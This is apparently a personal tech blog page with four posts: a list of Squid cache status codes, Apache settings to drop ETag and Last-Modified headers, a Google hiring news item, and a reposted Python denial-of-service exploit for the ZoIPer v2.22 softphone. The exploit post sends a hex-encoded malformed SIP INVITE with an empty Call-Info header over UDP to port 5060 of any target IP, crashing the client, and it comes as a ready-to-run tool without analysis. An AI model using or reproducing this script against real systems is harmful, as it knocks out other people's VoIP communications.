Nov 30

Squid Status Code Explain

By jason Cache Server 1 Comment »

TCP_HIT
A valid copy of the requested object was in the cache.

TCP_MISS
The requested object was not in the cache.

TCP_REFRESH_HIT
The requested object was cached but STALE. The IMS query for the object resulted in “304 not modified”.

TCP_REF_FAIL_HIT
The requested object was cached but STALE. The IMS query failed and the stale object was delivered.

TCP_REFRESH_MISS
The requested object was cached but STALE. The IMS query returned the new content.

TCP_CLIENT_REFRESH_MISS
The client issued a “no-cache” pragma, or some analogous cache control command along with the request. Thus, the cache has to refetch the object.

TCP_IMS_HIT
The client issued an IMS request for an object which was in the cache and fresh.

TCP_SWAPFAIL_MISS
The object was believed to be in the cache, but could not be accessed.

TCP_NEGATIVE_HIT
Request for a negatively cached object, e.g. “404 not found”, for which the cache believes to know that it is inaccessible. Also refer to the explainations for negative_ttl in your squid.conf file.

TCP_MEM_HIT
A valid copy of the requested object was in the cache and it was in memory, thus avoiding disk accesses.

TCP_DENIED
Access was denied for this request.

TCP_OFFLINE_HIT
The requested object was retrieved from the cache during offline mode. The offline mode never validates any object, see offline_mode in squid.conf file.

UDP_HIT
A valid copy of the requested object was in the cache.

UDP_MISS
The requested object is not in this cache.

UDP_DENIED
Access was denied for this request.

UDP_INVALID
An invalid request was received.

UDP_MISS_NOFETCH
During “-Y” startup, or during frequent failures, a cache in hit only mode will return either UDP_HIT or this code. Neighbours will thus only fetch hits.

NONE
Seen with errors and cachemgr requests. The following codes are no longer available in Squid-2:

ERR_*
Errors are now contained in the status code.

TCP_CLIENT_REFRESH
See: TCP_CLIENT_REFRESH_MISS.

TCP_SWAPFAIL
See: TCP_SWAPFAIL_MISS.

TCP_IMS_MISS
Deleted, TCP_IMS_HIT used instead.

UDP_HIT_OBJ
Hit objects are no longer available.

UDP_RELOADING
See: UDP_MISS_NOFETCH.

Tagged with:
Nov 30

How To Close Etag & Last-Modified

By jason Apache Server No Comments »

Close Etag for Apache:

FileETag none

If you want to close Last-Modified keyword, you need load header module and modified httpd.conf.

LoadModule headers_module modules/mod_headers.so

<FilesMatch "\.(gif|jpg|png)">
Header unset Last-Modified
</FilesMatch>

Tagged with:
Nov 27

ZoIPer V2.22 Call-Info Remote Denial Of Service

By jason Security Tools No Comments »

#!/usr/bin/python

# ZoIPer v2.22 Call-Info Remote Denial Of Service.
# Remote Crash P.O.C.
# Author: Tomer Bitton (Gr33n_G0bL1n)
# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10
#
# Vendor Notified on: 21/09/2009
# Vendor Fix: Fixed in version 2.24 Library 5324
#
# Bad Chars:   \x20  ,  \x09

import sys
import socket
import os

def main(argc , argv):

    if len(sys.argv) != 2:
        os.system("cls")
        sys.exit("Usage: " + sys.argv[0] + " <target_ip>\n")
    target_host = sys.argv[1]
    target_port = 5060

    evil_packet =   "\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\
                    "\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\
                    "\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\
                    "\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\
                    "\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\
                    "\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\
                    "\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\
                    "\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\
                    "\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\
                    "\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\
                    "\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\
                    "\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\
                    "\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\
                    "\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\
                    "\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\
                    "\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\
                    "\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\
                    "\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\
                    "\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\
                    "\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\
                    "\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\
                    "\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\
                    "\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\
                    "\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a"
    os.system("cls")               
    print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n"
    print "[+] Exploited By Gr33n_G0bL1n\r\n"
    print "[+] Connecting to %s on port %d\r\n" % (target_host,target_port)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect((target_host,target_port))
        print "[+] Trying To Send Evil Packet…\r\n"
        s.sendall(evil_packet)
        s.close()
        print "[+] Done!\r\n"
    except:
        print "[x] Connection Error!\r\n"

if (__name__ == "__main__"):
    sys.exit(main(len(sys.argv), sys.argv))

Tagged with:
Nov 02

Google: You too could win millions in stock

By jason IT News World No Comments »

Google is once again dangling incentives before engineers.

Google’s Chrome browser earned its developers millions in stock bonuses.

The company threw open its doors Monday to the engineering community Monday, announcing that it granted a Founders’ Prize–"a multimillion-dollar stock bonus"–to the team that developed Google Chrome. "(The) future is shaped by small teams of creative people who want to make a difference. We’re on the hunt for these kind of people — let us know if you think you’re one of them," wrote Alan Eustace, senior vice president for engineering and research at Google.

Google is still one of Silicon Valley’s most generous companies in terms of employee perks, but Google’s hiring slowed over the past year as the recession took hold and the company scaled back some of those famous extras. Google even was forced to cut employees in March, and has also suffered as a number of high-profile employees decided to seek (or expand) their fortunes elsewhere.

But CEO Eric Schmidt is ready to let the good times roll once again, announcing earlier in the year that Google was set to expand hiring and acquisitions, and backing up that confidence on Google’s most recent earnings conference call.

Google also announced that Chrome now has 30 million active users. The browser trails market leaders Internet Explorer and Firefox by a wide margin, but it’s growing faster than the competition.

Tagged with:
preload preload preload